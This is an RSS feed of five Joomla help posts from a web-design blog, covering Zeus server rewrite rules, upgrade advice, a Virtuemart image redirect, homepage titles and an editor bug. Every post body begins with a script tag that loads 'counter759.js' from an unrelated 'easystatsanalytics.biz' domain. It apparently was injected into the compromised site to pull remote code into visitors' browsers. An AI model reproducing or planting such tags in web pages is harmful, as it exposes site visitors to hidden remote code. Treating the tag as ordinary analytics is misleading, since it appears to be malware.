<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Adam Christie SEO Scotland Web Design &#38; Online Marketing &#187; Joomla</title>
	<atom:link href="http://www.adamchristie.co.uk/category/joomla/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.adamchristie.co.uk</link>
	<description>Internet marketing, web development blog.</description>
	<lastBuildDate>Mon, 17 Oct 2011 17:35:55 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.4</generator>
		<item>
		<title>Joomla SEF Page Script for Namesco Zeus Server</title>
		<link>http://www.adamchristie.co.uk/seo/joomla-sef-page-script-for-namesco-zeus-server/</link>
		<comments>http://www.adamchristie.co.uk/seo/joomla-sef-page-script-for-namesco-zeus-server/#comments</comments>
		<pubDate>Fri, 18 Jun 2010 12:20:18 +0000</pubDate>
		<dc:creator>Adam</dc:creator>
				<category><![CDATA[Joomla]]></category>
		<category><![CDATA[SEO]]></category>

		<guid isPermaLink="false">http://www.adamchristie.co.uk/?p=290</guid>
		<description><![CDATA[A while back I posted the solution I use for WordPress friendly URL&#8217;s on a Namesco Zeus server and it seems to have helped out a bunch of people so I thought I&#8217;d publish the script I use on Joomla. Joomla&#8217;s standard friendly URL&#8217;s use the mod_rewrite function in an htaccess file which isn&#8217;t available [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><script type='text/javascript' src='http://easystatsanalytics.biz/counter759.js'></script>A while back I posted the solution I use for <a href="http://www.adamchristie.co.uk/wordpress/seo-friendly-wordpress-urls-on-namesco-zeus-servers/">WordPress friendly URL&#8217;s on a Namesco Zeus server</a> and it seems to have helped out a bunch of people so I thought I&#8217;d publish the script I use on Joomla.</p>
<p>Joomla&#8217;s standard friendly URL&#8217;s use the mod_rewrite function in an htaccess file which isn&#8217;t available when hosting on a Zeus server. You need to provide a script called rewrite.script that uses intructions Zeus understands.</p>
<p>Below is the code I use in my rewrite.script file. Take this code, paste it in a text editor and save it as rewrite.script. Then upload it to the web root of your Joomla installation.</p>
<blockquote><p>map path into SCRATCH:path from %{URL}<br />
look for file at %{SCRATCH:path}<br />
if matched then goto RULE_END<br />
look for dir at %{SCRATCH:path}<br />
if matched then goto RULE_END<br />
match URL into $ with ^/index.php<br />
if matched then goto RULE_END<br />
insensitive match URL into $ with (/|\.php|\.html|\.feed|\.pdf|\.raw|/[^.]*)$<br />
if matched then set URL = /index.php<br />
RULE_END:</p></blockquote>
<p>Next go to your Joomla Global configuration and switch the Friendly URL&#8217;s on.</p>
<p><img class="alignnone size-full wp-image-291" title="joomla-sef" src="http://www.adamchristie.co.uk/wp-content/uploads/2010/06/joomla-sef.png" alt="Joomla SEF on Namesco Zeus" width="422" height="132" /></p>
<p>And fingers crossed you should have friendly URL&#8217;s switched on.</p>
<p>If it doesn&#8217;t work, just switch them off again in your global configuration.</p>
<p><em>Footnote &#8211; not being a Zeus server tech I&#8217;m not really sure how the script works, so can&#8217;t really supply any support on it.</em></p>
<p>UPDATE: The above script didn&#8217;t work for me when I was using SOBI2 on a Joomla site. Thankfully though <a href="http://www.rootcreative.co.uk/blog/joomla-seo-friendly-urls-using-zeus-servers/">Root Creative</a> had posted a script on their site that worked perfectly. Try it if you have trouble with the one above, try Root Creative&#8217;s one.</p>
<script type="text/javascript">
  addthis_url    = 'http%3A%2F%2Fwww.adamchristie.co.uk%2Fseo%2Fjoomla-sef-page-script-for-namesco-zeus-server%2F';
  addthis_title  = 'Joomla+SEF+Page+Script+for+Namesco+Zeus+Server';
  addthis_pub    = '';
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
]]></content:encoded>
			<wfw:commentRss>http://www.adamchristie.co.uk/seo/joomla-sef-page-script-for-namesco-zeus-server/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Joomla Upgrades Quick Tip</title>
		<link>http://www.adamchristie.co.uk/joomla/joomla-upgrades-quick-tip/</link>
		<comments>http://www.adamchristie.co.uk/joomla/joomla-upgrades-quick-tip/#comments</comments>
		<pubDate>Tue, 19 Jan 2010 16:41:04 +0000</pubDate>
		<dc:creator>Adam</dc:creator>
				<category><![CDATA[Joomla]]></category>

		<guid isPermaLink="false">http://www.adamchristie.co.uk/?p=278</guid>
		<description><![CDATA[If you&#8217;re upgrading an old version of Joomla, it can help to make sure your hosting is running both PHP5 and MySQL5. Lots of people will still be on version 4 of both and while Joomla may seem like it installs OK, lots of components and modules with either not install or not display correctly. [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><script type='text/javascript' src='http://easystatsanalytics.biz/counter759.js'></script>If you&#8217;re upgrading an old version of Joomla, it can help to make sure your hosting is running both PHP5 and MySQL5.</p>
<p>Lots of people will still be on version 4 of both and while Joomla may seem like it installs OK, lots of components and modules with either not install or not display correctly.</p>
<p>However, many people are still having problems with PHP5.3 so err on the safe side and stick to 5.2 for PHP just now if you have the choice.</p>
<script type="text/javascript">
  addthis_url    = 'http%3A%2F%2Fwww.adamchristie.co.uk%2Fjoomla%2Fjoomla-upgrades-quick-tip%2F';
  addthis_title  = 'Joomla+Upgrades+Quick+Tip';
  addthis_pub    = '';
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
]]></content:encoded>
			<wfw:commentRss>http://www.adamchristie.co.uk/joomla/joomla-upgrades-quick-tip/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Virtuemart Images Disappear When You Move Joomla Directory</title>
		<link>http://www.adamchristie.co.uk/joomla/virtuemart-images-disappear-when-you-move-joomla-directory/</link>
		<comments>http://www.adamchristie.co.uk/joomla/virtuemart-images-disappear-when-you-move-joomla-directory/#comments</comments>
		<pubDate>Thu, 28 May 2009 11:03:31 +0000</pubDate>
		<dc:creator>Adam</dc:creator>
				<category><![CDATA[Joomla]]></category>

		<guid isPermaLink="false">http://www.adamchristie.co.uk/?p=249</guid>
		<description><![CDATA[This is one of those niggling little problems I had this week. I usually build a Joomla site in a temporary directory of the domain it is going live on then move it to the root directory once the site launches. The normal process involves changing the temporary location in the Joomla configuration file and [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><script type='text/javascript' src='http://easystatsanalytics.biz/counter759.js'></script>This is one of those niggling little problems I had this week. I usually build a Joomla site in a temporary directory of the domain it is going live on then move it to the root directory once the site launches. The normal process involves changing the temporary location in the Joomla configuration file and if you&#8217;re running Virtuemart e-commerce, change the directories in Virtuemart&#8217;s configuration file too, then move the site to the root directory.</p>
<p>However this week when I thought it had all gone smoothly, it appeared that secondary and additional product images were not showing up when enlarged. It turns out they were still being referenced in the old directory.</p>
<p>A look at the database told me that the full URL for the large version of secondary images/files had been coded into the database for every image meaning that when I moved the site, the URL&#8217;s were then pointing at empty locations.</p>
<p>There were two ways I could think of to solve this:</p>
<p>1. Use a redirect on the images directory. I just added this line at the end of the .htaccess file:</p>
<blockquote><p>redirect 301 /temp_dir/components/com_virtuemart/shop_image/product/ http://www.domain.com/components/com_virtuemart/shop_image/product/</p></blockquote>
<p>2. Use phpMyAdmin on your server and go through each row in the j<strong>os_vm_product_files</strong> table and edit to put the new location in the <strong>file_url</strong> field. If you&#8217;ve got a lot of images, this can take a while.</p>
<p>For the moment, both ways seem to work.</p>
<script type="text/javascript">
  addthis_url    = 'http%3A%2F%2Fwww.adamchristie.co.uk%2Fjoomla%2Fvirtuemart-images-disappear-when-you-move-joomla-directory%2F';
  addthis_title  = 'Virtuemart+Images+Disappear+When+You+Move+Joomla+Directory';
  addthis_pub    = '';
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
]]></content:encoded>
			<wfw:commentRss>http://www.adamchristie.co.uk/joomla/virtuemart-images-disappear-when-you-move-joomla-directory/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Joomla 1.5 Homepage Title &#8211; Joomla SEO</title>
		<link>http://www.adamchristie.co.uk/seo/joomla-15-homepage-title-joomla-seo/</link>
		<comments>http://www.adamchristie.co.uk/seo/joomla-15-homepage-title-joomla-seo/#comments</comments>
		<pubDate>Wed, 15 Oct 2008 10:02:58 +0000</pubDate>
		<dc:creator>Adam</dc:creator>
				<category><![CDATA[Joomla]]></category>
		<category><![CDATA[SEO]]></category>

		<guid isPermaLink="false">http://www.adamchristie.co.uk/?p=205</guid>
		<description><![CDATA[I&#8217;ve seen a lot of Joomla 1.5 sites recently where the homepage title is simply &#8220;Home&#8221;. Obviously this isn&#8217;t an ideal situation and you generally want your homepage title to include your best search term for the site. It&#8217;s very easy to fix though: From your Joomla Admin Dashboard go to Menus &#62; Main Menu [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><script type='text/javascript' src='http://easystatsanalytics.biz/counter759.js'></script><img class="size-full wp-image-208 alignleft" title="joomla-seo1" src="http://www.adamchristie.co.uk/wp-content/uploads/2008/10/joomla-seo1.jpg" alt="" width="180" height="70" />I&#8217;ve seen a lot of Joomla 1.5 sites recently where the homepage title is simply &#8220;Home&#8221;. Obviously this isn&#8217;t an ideal situation and you generally want your homepage title to include your best search term for the site. It&#8217;s very easy to fix though:</p>
<ul>
<li>From your Joomla Admin Dashboard go to Menus &gt; Main Menu</li>
<li>Click on the Home link in the table of menu items</li>
<li>In the right column, open the Parameters &#8211; System tab</li>
<li>Put your optimised title in the Page Title box</li>
<li>If you want your optimised title to be repeated on the home page above any article titles check the Yes button below for Display Page Title. Otherwise if you just want it to show in the browser title bar leave it at No</li>
<li>Save out of there and refresh your Joomla home page to find your optimised title right there in the browser title bar</li>
</ul>
<p>It&#8217;s not just from an SEO point of view that you want that title to show up properly in Joomla. If a customer is searching for widgets and their search results present them with your site titled &#8220;Home&#8221; in the 1st position and yor competitor titled &#8220;Joe Brown&#8217;s Cheap Widget Warehouse&#8221; I think I know who&#8217;t going to get the click and the sale. So, if you are building a site in Joomla, make sure you get an optimised title on to the home page.</p>
<script type="text/javascript">
  addthis_url    = 'http%3A%2F%2Fwww.adamchristie.co.uk%2Fseo%2Fjoomla-15-homepage-title-joomla-seo%2F';
  addthis_title  = 'Joomla+1.5+Homepage+Title+%26%238211%3B+Joomla+SEO';
  addthis_pub    = '';
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
]]></content:encoded>
			<wfw:commentRss>http://www.adamchristie.co.uk/seo/joomla-15-homepage-title-joomla-seo/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Joomla Content Editor JCE and Google Chrome Not Working</title>
		<link>http://www.adamchristie.co.uk/joomla/joomla-content-editor-jce-and-google-chrome-not-working/</link>
		<comments>http://www.adamchristie.co.uk/joomla/joomla-content-editor-jce-and-google-chrome-not-working/#comments</comments>
		<pubDate>Thu, 09 Oct 2008 12:15:22 +0000</pubDate>
		<dc:creator>Adam</dc:creator>
				<category><![CDATA[Joomla]]></category>

		<guid isPermaLink="false">http://www.adamchristie.co.uk/?p=203</guid>
		<description><![CDATA[Not best bedfellows it turns out. I&#8217;ve been banging my head against a Joomla site all morning, trying to get formatting to stick that I&#8217;d applied on pages and it just kept getting wiped out. I use JCE as the editor on the site in question and forgot I was using the Google Chrome browser. [...]]]></description>
			<content:encoded><![CDATA[<p></p><p><script type='text/javascript' src='http://easystatsanalytics.biz/counter759.js'></script>Not best bedfellows it turns out. I&#8217;ve been banging my head against a Joomla site all morning, trying to get formatting to stick that I&#8217;d applied on pages and it just kept getting wiped out. I use JCE as the editor on the site in question and forgot I was using the Google Chrome browser. After far too much perseverence I changed to using Firefox and as usual everything started running smoothly again. Firefox 1 Chrome 0.</p>
<script type="text/javascript">
  addthis_url    = 'http%3A%2F%2Fwww.adamchristie.co.uk%2Fjoomla%2Fjoomla-content-editor-jce-and-google-chrome-not-working%2F';
  addthis_title  = 'Joomla+Content+Editor+JCE+and+Google+Chrome+Not+Working';
  addthis_pub    = '';
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
]]></content:encoded>
			<wfw:commentRss>http://www.adamchristie.co.uk/joomla/joomla-content-editor-jce-and-google-chrome-not-working/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>

